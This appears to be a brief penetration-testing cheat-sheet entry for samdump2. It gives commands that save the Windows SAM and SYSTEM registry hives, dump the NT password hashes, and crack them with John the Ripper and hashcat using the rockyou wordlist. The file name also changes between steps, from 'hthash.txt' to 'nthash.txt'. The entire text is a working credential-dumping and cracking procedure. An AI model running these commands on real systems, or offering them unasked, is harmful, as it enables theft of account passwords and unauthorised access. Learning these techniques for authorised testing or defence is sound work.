samdump2

# Copy sam and system files 
reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system

# Dump hash
samdump2 system sam > hthash.txt

# Crack hash
john --format=NT nthash.txt
hashcat -m 1000 nthash.txt /usr/share/wordlists/rockyou.txt

Last updated